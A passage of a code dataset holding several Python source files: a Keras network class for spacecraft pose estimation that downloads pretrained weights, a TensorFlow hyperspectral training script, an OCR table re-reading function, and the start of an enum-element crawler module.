filter(lambda l: l.name not in exclude, layers)\n\n if by_name:\n topology.load_weights_from_hdf5_group_by_name(f, layers)\n else:\n topology.load_weights_from_hdf5_group(f, layers)\n if hasattr(f, 'close'):\n f.close()\n\n # Update the log directory\n self.set_log_dir(weights_out_path)\n\n def get_imagenet_weights(self, architecture):\n \"\"\"Downloads ImageNet trained weights from Keras.\n Returns path to weights file.\n \"\"\"\n from keras.utils.data_utils import get_file\n\n if architecture in ['resnet50', 'resnet101']:\n TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/' \\\n 'releases/download/v0.2/' \\\n 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'\n weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',\n TF_WEIGHTS_PATH_NO_TOP,\n cache_subdir='models',\n md5_hash='a268eb855778b3df3c7506639542a6af')\n elif architecture == 'resnet18':\n\n TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/qubvel/classification_models/'\\\n 'releases/download/0.0.1/resnet18_imagenet_1000_no_top.h5'\n weights_path = get_file('resnet18_imagenet_1000_no_top.h5',\n TF_WEIGHTS_PATH_NO_TOP,\n cache_subdir='models',\n md5_hash='318e3ac0cd98d51e917526c9f62f0b50')\n elif architecture == 'resnet34':\n\n TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/qubvel/classification_models/'\\\n 'releases/download/0.0.1/resnet34_imagenet_1000_no_top.h5'\n weights_path = get_file('resnet34_imagenet_1000_no_top.h5',\n TF_WEIGHTS_PATH_NO_TOP,\n cache_subdir='models',\n md5_hash='8caaa0ad39d927cb8ba5385bf945d582')\n return weights_path\n\n def get_urso_weights(self, dataset_name):\n \"\"\"Downloads URSO trained weights from Keras.\n Returns path to weights file.\n \"\"\"\n\n assert dataset_name in ['soyuz_hard', 'dragon_hard', 'speed']\n\n from keras.utils.data_utils import get_file\n\n if dataset_name == \"soyuz_hard\":\n\n assert self.config.BACKBONE == 'resnet50'\n assert self.config.BOTTLENECK_WIDTH == 128\n assert self.config.ORI_BINS_PER_DIM == 24\n\n weights_name = 'resnet50_soyuz_hard_128_24.h5'\n\n TF_WEIGHTS_PATH = 'https://github.com/pedropro/UrsoNet/releases/download/v1.0/' + weights_name\n\n elif dataset_name == \"dragon_hard\":\n\n assert self.config.BACKBONE == 'resnet50'\n assert self.config.BOTTLENECK_WIDTH == 128\n assert self.config.ORI_BINS_PER_DIM == 24\n\n weights_name = 'resnet50_dragon_hard_128_24.h5'\n\n TF_WEIGHTS_PATH = 'https://github.com/pedropro/UrsoNet/releases/download/v1.0\\/' + weights_name\n\n\n elif dataset_name == \"speed\":\n\n assert self.config.BACKBONE == 'resnet101'\n\n if self.config.ORI_BINS_PER_DIM == 32:\n\n assert self.config.BOTTLENECK_WIDTH == 528\n\n weights_name = 'resnet101_speed_528_32.h5'\n\n TF_WEIGHTS_PATH = 'https://github.com/pedropro/UrsoNet/releases/download/v1.0/' + weights_name\n\n\n elif self.config.ORI_BINS_PER_DIM == 64:\n\n assert self.config.BOTTLENECK_WIDTH == 800\n\n weights_name = 'resnet101_speed_800_64.h5'\n\n TF_WEIGHTS_PATH = 'https://github.com/pedropro/UrsoNet/releases/download/v1.0/' + weights_name\n\n\n weights_path = get_file(weights_name,TF_WEIGHTS_PATH,cache_subdir='models')\n\n return weights_path\n\n\n\n def set_log_dir(self, model_path=None):\n \"\"\"Sets the model log directory and epoch counter.\n\n model_path: If None, or a format different from what this code uses\n then set a new log directory and start epochs from 0. Otherwise,\n extract the log directory and the epoch counter from the file\n name.\n \"\"\"\n\n if model_path:\n # Directory for training logs\n self.log_dir = os.path.dirname(model_path)\n self.epoch = int(model_path[-6:-3])\n else:\n self.epoch = 0\n now = datetime.datetime.now()\n self.log_dir = os.path.join(self.model_dir, \"{}{:%Y%m%dT%H%M}\".format(\n self.config.NAME.lower(), now))\n\n # Path to save after each epoch. Include placeholders that get filled by Keras.\n self.checkpoint_path = os.path.join(self.log_dir, \"weights_{}_*epoch*.h5\".format(\n self.config.NAME.lower()))\n self.checkpoint_path = self.checkpoint_path.replace(\n \"*epoch*\", \"{epoch:04d}\")\n\n ############################################################\n # Weights Loading Functions\n ############################################################\n\n def compile(self, learning_rate, momentum):\n \"\"\"Gets the model ready for training. Adds losses, regularization, and\n metrics. Then calls the Keras compile() function.\n \"\"\"\n\n # Optimizer object\n if self.config.OPTIMIZER == 'SGD':\n optimizer = keras.optimizers.SGD(lr=learning_rate, momentum=momentum,\n clipnorm=self.config.GRADIENT_CLIP_NORM)\n else:\n optimizer = keras.optimizers.Adam(learning_rate, amsgrad=True, clipnorm=self.config.GRADIENT_CLIP_NORM)\n\n # Add Losses\n # First, clear previously set losses to avoid duplication\n self.keras_model._losses = []\n self.keras_model._per_input_losses = {}\n if self.config.REGRESS_KEYPOINTS:\n loss_names = [\"loc_loss\", \"k2_loss\", \"k3_loss\"]\n else:\n loss_names = [\"loc_loss\", \"ori_loss\"]\n for name in loss_names:\n layer = self.keras_model.get_layer(name)\n if layer.output in self.keras_model.losses:\n continue\n loss = (\n tf.reduce_mean(layer.output, keepdims=True)\n * self.config.LOSS_WEIGHTS.get(name, 1.))\n self.keras_model.add_loss(loss)\n\n tensor_dtype = tf.float32\n if self.config.F16:\n tensor_dtype = tf.float16\n\n # Add L2 Regularization\n # Skip gamma and beta weights of batch normalization layers.\n reg_losses = [\n keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(w), tensor_dtype)\n for w in self.keras_model.trainable_weights\n if 'gamma' not in w.name and 'beta' not in w.name]\n self.keras_model.add_loss(tf.add_n(reg_losses))\n\n # Compile\n self.keras_model.compile(\n optimizer=optimizer,\n loss=[None] * len(self.keras_model.outputs))\n\n # Add metrics for losses\n for name in loss_names:\n if name in self.keras_model.metrics_names:\n continue\n layer = self.keras_model.get_layer(name)\n self.keras_model.metrics_names.append(name)\n loss = (\n tf.reduce_mean(layer.output, keepdims=True)\n * self.config.LOSS_WEIGHTS.get(name, 1.))\n self.keras_model.metrics_tensors.append(loss)\n\n def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1):\n \"\"\"Sets model layers as trainable if their names match\n the given regular expression.\n \"\"\"\n # Print message on the first call (but not on recursive calls)\n if verbose > 0 and keras_model is None:\n log(\"Selecting layers to train\")\n\n keras_model = keras_model or self.keras_model\n\n # In multi-GPU training, we wrap the model. Get layers\n # of the inner model because they have the weights.\n layers = keras_model.inner_model.layers if hasattr(keras_model, \"inner_model\") \\\n else keras_model.layers\n\n for layer in layers:\n # Is the layer a model?\n if layer.__class__.__name__ == 'Model':\n print(\"In model: \", layer.name)\n self.set_trainable(\n layer_regex, keras_model=layer, indent=indent + 4)\n continue\n\n if not layer.weights:\n continue\n\n # Is it trainable?\n trainable = bool(re.fullmatch(layer_regex, layer.name))\n # Update layer. If layer is a container, update inner layer.\n if layer.__class__.__name__ == 'TimeDistributed':\n layer.layer.trainable = trainable\n else:\n layer.trainable = trainable\n # Print trainble layer names\n if trainable and verbose > 0:\n log(\"{}{:20} ({})\".format(\" \" * indent, layer.name,\n layer.__class__.__name__))\n\n def train(self, train_dataset, val_dataset, learning_rate, epochs, layers):\n \"\"\"Train the model.\n train_dataset, val_dataset: Training and validation Dataset objects.\n learning_rate: The learning rate to train with\n epochs: Number of training epochs.\n layers: Allows selecting wich layers to train. It can be:\n - A regular expression to match layer names to train\n - One of these predefined values:\n heaads: The RPN, classifier and mask heads of the network\n all: All the layers\n 3+: Train Resnet stage 3 and up\n 4+: Train Resnet stage 4 and up\n 5+: Train Resnet stage 5 and up\n \"\"\"\n assert self.mode == \"training\", \"Create model in training mode.\"\n\n # Pre-defined layer regular expressions\n # All options except 'all' are only currently valid for resnet50 and renet101 models\n layer_regex = {\n # all layers but the backbone\n \"heads\": r\"(ori\\_.*)|(loc\\_.*)|(fpn\\_.*)|(bottleneck_layer)\",\n # From a specific Resnet stage and up\n \"3+\": r\"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(loc\\_.*)|(ori\\_.*)|(fpn\\_.*)|(bottleneck_layer)\",\n \"4+\": r\"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(loc\\_.*)|(ori\\_.*)|(fpn\\_.*)|(bottleneck_layer)\",\n \"5+\": r\"(res5.*)|(bn5.*)|(loc\\_.*)|(ori\\_.*)|(fpn\\_.*)|(bottleneck_layer)\",\n # All layers\n \"all\": \".*\",\n }\n if layers in layer_regex.keys():\n layers = layer_regex[layers]\n\n # Data generators\n train_generator = data_generator(train_dataset, self.config, shuffle=True,\n batch_size=self.config.BATCH_SIZE)\n val_generator = data_generator(val_dataset, self.config, shuffle=True,\n batch_size=self.config.BATCH_SIZE)\n\n # Callbacks\n class BatchLogger(tf.keras.callbacks.Callback):\n def __init__(self):\n self.ori_loss_acc = []\n self.loc_loss_acc = []\n\n def on_batch_end(self, batch, logs={}):\n self.ori_loss_acc.append(logs.get('ori_loss'))\n self.loc_loss_acc.append(logs.get('loc_loss'))\n\n history_full = BatchLogger()\n\n callbacks = [\n keras.callbacks.TensorBoard(log_dir=self.log_dir,\n histogram_freq=0, write_graph=True, write_images=False),\n keras.callbacks.ModelCheckpoint(self.checkpoint_path,\n verbose=0, save_weights_only=True),\n history_full\n ]\n\n if self.config.CLR:\n import clr_callback\n\n clr_triangular = clr_callback.CyclicLR(self.config.BASE_LEARNING_RATE, self.config.MAX_LEARNING_RATE,\n self.config.CLR_STEP_SIZE, mode='triangular')\n callbacks.append(clr_triangular)\n\n\n # Train\n log(\"\\nStarting at epoch {}. LR={}\\n\".format(self.epoch, learning_rate))\n log(\"Checkpoint Path: {}\".format(self.checkpoint_path))\n self.set_trainable(layers)\n self.compile(learning_rate, self.config.LEARNING_MOMENTUM)\n\n # TODO: print('Total FLOPs',get_flops(self))\n\n # print('Orientation var:', K.eval(K.exp(self.ori_weight)))\n # print('Location var:', K.eval(K.exp(self.loc_weight)))\n\n # Work-around for Windows: Keras fails on Windows when using\n # multiprocessing workers. See discussion here:\n # https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009\n if os.name is 'nt':\n workers = 0\n else:\n workers = multiprocessing.cpu_count()\n\n hist = self.keras_model.fit_generator(\n train_generator,\n initial_epoch=self.epoch,\n epochs=epochs,\n steps_per_epoch=self.config.STEPS_PER_EPOCH,\n callbacks=callbacks,\n validation_data=val_generator,\n validation_steps=self.config.VALIDATION_STEPS,\n max_queue_size=100,\n workers=workers,\n use_multiprocessing=True,\n )\n\n self.epoch = max(self.epoch, epochs)\n\n return history_full\n\n def mold_inputs(self, images):\n \"\"\"Takes a list of images and modifies them to the format expected\n as an input to the neural network.\n images: List of image matricies [height,width,depth]. Images can have\n different sizes.\n\n Returns 3 Numpy matricies:\n molded_images: [N, h, w, 3]. Images resized and normalized.\n image_metas: [N, length of meta data]. Details about each image.\n windows: [N, (y1, x1, y2, x2)]. The portion of the image that has the\n original image (padding excluded).\n \"\"\"\n molded_images = []\n image_metas = []\n windows = []\n for image in images:\n # Resize image\n # TODO: move resizing to mold_image()\n molded_image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=self.config.IMAGE_MIN_DIM,\n min_scale=self.config.IMAGE_MIN_SCALE,\n max_dim=self.config.IMAGE_MAX_DIM,\n mode=self.config.IMAGE_RESIZE_MODE)\n molded_image = mold_image(molded_image, self.config)\n # Build image_meta\n image_meta = compose_image_meta(\n 0, image.shape, molded_image.shape, window, scale)\n # Append\n molded_images.append(molded_image)\n windows.append(window)\n image_metas.append(image_meta)\n # Pack into arrays\n molded_images = np.stack(molded_images)\n image_metas = np.stack(image_metas)\n windows = np.stack(windows)\n return molded_images, image_metas, windows\n\n def detect(self, images, verbose=0):\n \"\"\"Runs the detection pipeline.\n\n images: List of images, potentially of different sizes.\n\n Returns a list of dicts, one dict per image. The dict contains:\n rois: [N, (y1, x1, y2, x2)] detection bounding boxes\n class_ids: [N] int class IDs\n scores: [N] float probability scores for the class IDs\n masks: [H, W, N] instance binary masks\n \"\"\"\n assert self.mode == \"inference\", \"Create model in inference mode.\"\n assert len(\n images) == self.config.BATCH_SIZE, \"len(images) must be equal to BATCH_SIZE\"\n\n if verbose:\n log(\"Processing {} images\".format(len(images)))\n for image in images:\n log(\"image\", image)\n\n # Mold inputs to format expected by the neural network\n molded_images, image_metas, windows = self.mold_inputs(images)\n\n # Validate image sizes\n # All images in a batch MUST be of the same size\n image_shape = molded_images[0].shape\n for g in molded_images[1:]:\n assert g.shape == image_shape, \\\n \"After resizing, all images must have the same size. Check IMAGE_RESIZE_MODE and image sizes.\"\n if verbose:\n log(\"molded_images\", molded_images)\n log(\"image_metas\", image_metas)\n # Run object detection\n if self.config.REGRESS_KEYPOINTS:\n loc_pred, k1_pred, k2_pred = self.keras_model.predict(molded_images, verbose=0)\n # Process detections\n results = []\n for i, image in enumerate(images):\n results.append({\n \"loc\": loc_pred[i],\n \"k1\": k1_pred[i],\n \"k2\": k2_pred[i],\n })\n else:\n loc_pred, ori_pred = self.keras_model.predict(molded_images, verbose=0)\n # Process detections\n results = []\n for i, image in enumerate(images):\n results.append({\n \"loc\": loc_pred[i],\n \"ori\": ori_pred[i],\n })\n return results\n\n def ancestor(self, tensor, name, checked=None):\n \"\"\"Finds the ancestor of a TF tensor in the computation graph.\n tensor: TensorFlow symbolic tensor.\n name: Name of ancestor tensor to find\n checked: For internal use. A list of tensors that were already\n searched to avoid loops in traversing the graph.\n \"\"\"\n checked = checked if checked is not None else []\n # Put a limit on how deep we go to avoid very long loops\n if len(checked) > 500:\n return None\n # Convert name to a regex and allow matching a number prefix\n # because Keras adds them automatically\n if isinstance(name, str):\n name = re.compile(name.replace(\"/\", r\"(\\_\\d+)*/\"))\n\n parents = tensor.op.inputs\n for p in parents:\n if p in checked:\n continue\n if bool(re.fullmatch(name, p.name)):\n return p\n checked.append(p)\n a = self.ancestor(p, name, checked)\n if a is not None:\n return a\n return None\n\n def find_trainable_layer(self, layer):\n \"\"\"If a layer is encapsulated by another layer, this function\n digs through the encapsulation and returns the layer that holds\n the weights.\n \"\"\"\n if layer.__class__.__name__ == 'TimeDistributed':\n return self.find_trainable_layer(layer.layer)\n return layer\n\n def get_trainable_layers(self):\n \"\"\"Returns a list of layers that have weights.\"\"\"\n layers = []\n # Loop through all layers\n for l in self.keras_model.layers:\n # If layer is a wrapper, find inner trainable layer\n l = self.find_trainable_layer(l)\n # Include layer if it has weights\n if l.get_weights():\n layers.append(l)\n return layers\n\n############################################################\n# Data Formatting\n############################################################\n\ndef compose_image_meta(image_id, original_image_shape, image_shape,\n window, scale):\n \"\"\"Takes attributes of an image and puts them in one 1D array.\n\n image_id: An int ID of the image. Useful for debugging.\n original_image_shape: [H, W, C] before resizing or padding.\n image_shape: [H, W, C] after resizing and padding\n window: (y1, x1, y2, x2) in pixels. The area of the image where the real\n image is (excluding the padding)\n scale: The scaling factor applied to the original image (float32)\n active_class_ids: List of class_ids available in the dataset from which\n the image came. Useful if training on images from multiple datasets\n where not all classes are present in all datasets.\n \"\"\"\n meta = np.array(\n [image_id] + # size=1\n list(original_image_shape) + # size=3\n list(image_shape) + # size=3\n list(window) + # size=4 (y1, x1, y2, x2) in image coords\n [scale] # size=1\n )\n return meta\n\ndef mold_image(image, config):\n \"\"\"Subtract the mean pixel and converts it to float.\n \"\"\"\n\n tensor_dtype = np.float32\n if config.F16:\n tensor_dtype = np.float16\n\n if image.shape[-1]==3:\n return image.astype(tensor_dtype) - config.MEAN_PIXEL\n else:\n return image.astype(tensor_dtype) - np.mean(config.MEAN_PIXEL)\n\n\ndef unmold_image(normalized_images, config):\n \"\"\"Takes a image normalized with mold() and returns the original.\n TODO: This does not accept grayscale\"\"\"\n\n return (normalized_images + config.MEAN_PIXEL).astype(np.uint8)\n\n############################################################\n# Profiling Functions\n############################################################\n\ndef get_flops(model):\n run_meta = tf.RunMetadata()\n opts = tf.profiler.ProfileOptionBuilder.float_operation()\n\n # We use the Keras session graph in the call to the profiler.\n flops = tf.profiler.profile(graph=K.get_session().graph,\n run_meta=run_meta, cmd='op', options=opts)\n\n return flops.total_float_ops # Prints the \"flops\" of the model.\n\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":55371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"395769689","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 10 21:35:41 2017\n\n@author: fs\n\n\n这个是训练集读取20个tfrecord,为了平衡数据集\n\"\"\"\n\nimport numpy as np\nimport time\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nfrom HSI_branch import HSI_branch\nimport tensorflow as tf\nimport os\nfrom datetime import datetime\nimport logging\nfrom read_record import Reader\nimport sys\nimport glob\n\nBATCH_SIZE = 512\nIMAGE_HEIGHT = 17\nIMAGE_WIDTH = 17\n\ndef view_bar(message, num, total):\n rate = num / total\n rate_num = int(rate * 40)\n rate_nums = np.ceil(rate * 100)\n r = '\\r%s:[%s%s]%d%%\\t%d/%d' % (message, \">\" * rate_num, \" \" * (40 - rate_num), rate_nums, num, total,)\n sys.stdout.write(r)\n sys.stdout.flush()\n\ncheckpoint_dir = 'ckpt'\ncheckpoint_file = os.path.join(checkpoint_dir, 'model.ckpt')\ntrain_dir='summary'\n\ndef initLogging(logFilename='record.log'):\n \"\"\"Init for logging\n \"\"\"\n logging.basicConfig(\n level= logging.DEBUG,\n format='%(asctime)s-%(levelname)s-%(message)s',\n datefmt = '%y-%m-%d %H:%M',\n filename = logFilename,\n filemode = 'w');\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s-%(levelname)s-%(message)s')\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n \n \ninitLogging()\n\ndef placeholder_inputs(batch_size):\n hsi_pl = tf.placeholder(tf.float32,\n shape=(batch_size,IMAGE_HEIGHT,IMAGE_WIDTH,48))\n \n labels_pl = tf.placeholder(tf.int32, shape=(batch_size,))\n \n return hsi_pl, labels_pl\n\n\ndef do_eval(sess, step_name, HSIs_valid, labels_valid,hsi_pl, labels_pl, predicts1):\n\n valid_examples = 141324\n steps_per_epoch = valid_examples // BATCH_SIZE \n# corrects = []\n predicts= []\n labels = []\n for step in range(steps_per_epoch):\n view_bar('valid ', step, steps_per_epoch) \n hsi,label = sess.run([HSIs_valid, labels_valid]) \n predicts_value1 = sess.run(predicts1, feed_dict= {hsi_pl:hsi, labels_pl:label})\n predicts.extend(predicts_value1)\n labels.extend(label)\n\n matrix = get_matrix(labels,predicts)\n draw_table(matrix,step_name)\n \n AA = np.mean(matrix[20,:20])\n AR = np.mean(matrix[:20,20])\n precision = np.mean(np.array(predicts)==np.array(labels))\n logging.info('>>fusion matrix has been saved and AA={:.3f},AR={:.3f},precision={:.3f}'.format(AA,AR,precision))\n\ndef model_loss(logits1, labels):\n with tf.variable_scope('caculate_loss') :\n cross_entropy1 = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=labels, logits=logits1, name='corss_entropy1')\n cross_entropy_mean1 = tf.reduce_mean(cross_entropy1, name='cross_entropy_mean1')\n tf.summary.scalar('cross_loss1', cross_entropy_mean1)\n \n return cross_entropy_mean1\n\n\ndef model_training(variables1, loss1):\n def make_optimizer(loss, variables, name='Adam'):\n \"\"\" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)\n and a linearly decaying rate that goes to zero over the next 100k steps\n \"\"\"\n global_step = tf.Variable(0, trainable=False)\n learning_rate = 1e-4\n beta1 = 0.5\n learning_step = tf.train.AdamOptimizer(learning_rate, beta1=beta1, name=name).minimize(loss, global_step=global_step, var_list=variables)\n return learning_step \n \n optimizer1 = make_optimizer(loss1, variables1, name='Adam_1')\n ema = tf.train.ExponentialMovingAverage(decay=0.95)\n assert len([var for var in tf.trainable_variables()])==len(variables1)\n update_losses = ema.apply([loss1])\n\n return tf.group(update_losses, optimizer1)\n\ndef model_predict(logits):\n with tf.variable_scope('predict') : \n predicts = tf.argmax(logits, axis=-1, name='predict')\n return predicts\n\ndef get_matrix(labels, predicts):\n '''\n 列表示groundtruth,行表示预测,此函数返回值是混淆矩阵\n '''\n matrix = np.zeros((21,21))\n for i in range(len(labels)):\n matrix[labels[i],predicts[i]] += 1 \n \n matrix[:20,20] = np.round(np.diag(matrix[:20,:20])/np.sum(matrix[:20,:20],axis=1),2)\n matrix[20,:20] = np.round(np.diag(matrix[:20,:20])/np.sum(matrix[:20,:20],axis=0),2)\n \n return matrix\n \ndef draw_table(matrix, step_name):\n\n idx = pd.Index(np.arange(1,22))\n cols = list(map(str,np.arange(1,22)))\n\n df = pd.DataFrame(matrix, index=idx, columns=cols)\n fig, axes = plt.subplots()\n plt.figure(figsize=(20,10))\n the_table=plt.table(cellText=df.values, rowLabels=df.index, colLabels=df.columns, \n colWidths = [0.03]*df.values.shape[1], loc='center',cellLoc='center')\n \n the_table.set_fontsize(15)\n the_table.scale(2,2.1)\n plt.axis('off')\n plt.savefig('result_{}.png'.format(step_name),dpi=200)\n \ndef run_train():\n \"\"\"Train CAPTCHA for a number of steps.\"\"\"\n\n with tf.Graph().as_default(): \n records = glob.glob('data/*.tfrecord') \n train_readers = []\n for record in records: \n record_name = 'train_data' + os.path.basename(record).split('.')[0] \n train_reader = Reader(record, name = record_name, batch_size=40)\n train_readers.append(train_reader) \n \n valid_reader = Reader('tiny_val.tfrecord', name='valid_data', batch_size=BATCH_SIZE) \n train_imgs_and_labels = [train_reader_.feed(train_data = True) for train_reader_ in train_readers]\n\n HSIs_valid, labels_valid = valid_reader.feed(train_data = False)\n hsi_pl, labels_pl = placeholder_inputs(BATCH_SIZE)\n \n HSI = HSI_branch()\n logits1, outputs1, variables1 = HSI(hsi_pl,keep_prob=0.5)#(500, 2432)\n predicts1 = model_predict(logits1)\n loss1 = model_loss(logits1, labels_pl) \n \n \n train_op = model_training(variables1, loss1)\n summary = tf.summary.merge_all() \n saver = tf.train.Saver(max_to_keep=50)\n# init_op = tf.global_variables_initializer()\n sess = tf.Session()\n summary_writer = tf.summary.FileWriter(train_dir, sess.graph)\n# sess.run(init_op)\n saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir))\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n try: \n max_step = 50000 \n for step in range(15000,max_step):\n start_time = time.time() \n images_and_labels = sess.run(train_imgs_and_labels)\n HSIs, labels = [], []\n for hsi, label in images_and_labels:\n HSIs.extend(hsi)\n labels.extend(label) \n \n shuffle = np.random.permutation(range(len(labels)))\n HSIs = np.array(HSIs)\n labels = np.array(labels)\n \n HSIs = HSIs[shuffle][:BATCH_SIZE]\n labels = labels[shuffle][:BATCH_SIZE]\n \n _, loss_value, summary_str, predicts_value1 = sess.run([train_op, loss1, summary, predicts1],\\\n feed_dict={hsi_pl:HSIs, labels_pl:labels}\n )\n \n train_precision1 = np.mean(predicts_value1==labels)\n summary_writer.add_summary(summary_str, step)\n summary_writer.flush()\n duration = time.time() - start_time\n \n count = (step % 500) or 500\n message = ('>>Step: %d loss = %.4f acc = %.3f(%.3f sec) ETA = %.3f'\n % (step, loss_value, train_precision1, duration, (500-count)*duration))\n \n view_bar(message, count, 500)\n #-------------------------------\n if step % 500 == 0:\n logging.info('>>%s Saving in %s' % (datetime.now(), checkpoint_dir))\n saver.save(sess, checkpoint_file, global_step=step)\n \n logging.info('Valid Data Eval:')\n do_eval(sess,step,\n HSIs_valid, labels_valid, hsi_pl, labels_pl,predicts1\n )\n\n\n except KeyboardInterrupt:\n print('INTERRUPTED')\n coord.request_stop()\n\n finally:\n saver.save(sess, checkpoint_file, global_step=step)\n print('Model saved in file :%s'%checkpoint_dir)\n coord.request_stop()\n coord.join(threads)\n\n sess.close()\n\nif __name__ == '__main__':\n run_train()\n","sub_path":"training_method_1/train_hsi.py","file_name":"train_hsi.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602197202","text":"\"\"\"\nfunctions to OCR individual bbx's on a table region on an image to update the values in a data table\n\"\"\"\n\nimport cv2\nfrom file_ocr import TextOCR\nfrom copy import deepcopy\nimport numpy as np\nfrom lambda_reOCR.str_cleaners import note_fn, data_fn, header_fn\n\n\ndef nlp_output(value, output, col_type, header_fn, note_fn, data_fn):\n \"\"\"\n clean the ocr'd field\n \"\"\"\n if col_type == 'header':\n cleaned = header_fn(value, output)\n elif col_type == 'notes':\n cleaned = note_fn(value, output)\n elif col_type == 'data':\n cleaned = data_fn(value, output)\n else:\n raise IndexError('column type unknown')\n\n return cleaned\n\n\ndef reOCR(datatable, img_file, x_scale, y_scale, note_col):\n \"\"\"\n loop through the datatable for each element of text\n use bbx to calculate the roi on the image containing the text (remember scaling)\n scale and filter the roi\n reOCR the roi\n nlp the text - strip spaces, commas, currency signs\n apply the multiplier if identified\n validate each entry\n\n :param datatable: the extracted data table with only relevant data\n :return: cleaned_table: datatable with each element reOCR'd and nlp'd\n \"\"\"\n\n # todo - what is the minimum size for a good read > calculate the scale factor based on shape vs ideal\n\n # todo\n # create a temp directory\n # save the roi to tempdir\n # Q\n # creating a lot of bbx tiff files need to delete them\n\n cleaned_data_table = deepcopy(datatable)\n\n img_scale_factor = 2\n kernel = np.ones((1, 1), np.uint8)\n enlarge = 0.05\n img = cv2.imread(img_file)\n\n proc = TextOCR()\n\n for row_num, row in enumerate(datatable):\n for col_num, col in enumerate(row):\n if col:\n # the text in each bbx.\n value = col[0]['value']\n\n # calculate the bbx\n # roi = img[y,y+h : x:x+w]\n top = int(round(int(col[0]['top'])*y_scale*(1-enlarge/3)))\n bottom = int(round(int(col[0]['bottom'])*y_scale*(1+enlarge/3)))\n left = int(round(int(col[0]['left'])*x_scale*(1-enlarge/2)))\n right = int(round(int(col[0]['right'])*x_scale*(1+enlarge/2)))\n\n roi = img[top:bottom, left:right]\n img_dilation = cv2.dilate(roi, kernel, iterations=1)\n # img_erosion = cv2.erode(img_dilation, kernel, iterations=1)\n\n resized_roi = cv2.resize(img_dilation, None, fx=img_scale_factor, fy=img_scale_factor)\n\n blur = cv2.GaussianBlur(resized_roi, (5, 5), 0)\n\n # dynamic file naming\n filename = 'row{}_col{}.tiff'.format(row_num, col_num)\n\n cv2.imwrite(filename, blur)\n\n process_code, output, err = proc.scan(filename=filename)\n\n # todo - delete the temp file above\n\n decoded = output.decode('utf-8')\n\n # if process_code == 200:\n # print('mock log tesser output: {}'. format(decoded))\n # else:\n # print('tesser error: {}'.format(err))\n\n if col_num == 0:\n col_type = 'header'\n elif col_num == note_col:\n col_type = 'notes'\n elif col_num > note_col:\n col_type = 'data'\n else:\n raise IndexError('col type unknown')\n\n cleaned = nlp_output(value, decoded, col_type, header_fn, note_fn, data_fn)\n\n cleaned_data_table[row_num][col_num][0]['value'] = cleaned\n cleaned_data_table[row_num][col_num][0]['xmlnode'] = \"programmatically updated data value\"\n # print(cleaned_data_table[row_num][col_num])\n\n return cleaned_data_table\n","sub_path":"src/Parse_data/table_id/functions/lambda_reOCR/reOCR_table.py","file_name":"reOCR_table.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"205429526","text":"# -*- coding: utf-8 -*-\n\nfrom collections import namedtuple\n\n\nclass EnumElement(object):\n\tdef __init__(self, name, code_file, code_line, value=None, *args, **kwds):\n\t\tsuper(EnumElement, self).__init__(*args, **kwds)\n\t\tself.name = name\n\t\tself.code_file = code_file\n\t\tself.code_line = code_line\n\t\tself.value = value\n\n\t@property\n\tdef code_location(self):\n\t\treturn \"%s:%d\" % (\n\t\t\t\tself.code_file,\n\t\t\t\tself.code_line,\n\t\t)\n\n\tdef combine(self, other):\n\t\t# type: (EnumElement) -> None\n\t\tif other is self:\n\t\t\treturn\n\t\tif self.name != other.name:\n\t\t\traise ValueError(\"cannot combine two EnumElement instance with different name: %r @%s, %r @%s.\" % (\n\t\t\t\t\tself.name,\n\t\t\t\t\tself.code_location,\n\t\t\t\t\tother.name,\n\t\t\t\t\tother.code_location,\n\t\t\t))\n\t\tif self.value is None:\n\t\t\tself.value = other.value\n\t\t\tself.code_file = other.code_file\n\t\t\tself.code_line = other.code_line\n\t\telif (other.value is not None) and (self.value != other.value):\n\t\t\traise ValueError(\"cannot combine two EnumElement with conflict value: name=%r, value=%r @%s, %r @%s\" % (\n\t\t\t\t\tself.name,\n\t\t\t\t\tself.value,\n\t\t\t\t\tself.code_location,\n\t\t\t\t\tother.value,\n\t\t\t\t\tother.code_location,\n\t\t\t))\n\t\treturn\n\n\tdef __eq__(self, other):\n\t\tif (self.name == other.name) and (((self.value is None) and (other.value is None)) or\n\t\t\t\t\t\t\t\t\t\t\t(self.value == other.value)):\n\t\t\treturn True\n\t\treturn False\n\n\tdef __ne__(self, other):\n\t\treturn not self.__eq__(other)\n\n\tdef __repr__(self):\n\t\treturn \"EnumElement(name=%r, code_file=%r, code_line=%r, value=%r)\" % (\n\t\t\t\tself.name,\n\t\t\t\tself.code_file,\n\t\t\t\tself.code_line,\n\t\t\t\tself.value,\n\t\t)\n\n\nCrawlerCallbacks = namedtuple(\"CrawlerCallbacks\", (\n\t\t\"outputpath_check_callable\",\n\t\t\"codefilepath_filter_callable\",\n\t\t\"enumelement_discover_callable\",\n\t\t\"enumelement_assign_callable\",\n\t\t\"codemap_write_callable\",\n))\n\"\"\"\nCrawlerCallbacks contains callback callables needed by enum element\ndiscovery-assign-generation process.\n\nArgs:\n\toutputpath_check_callable: 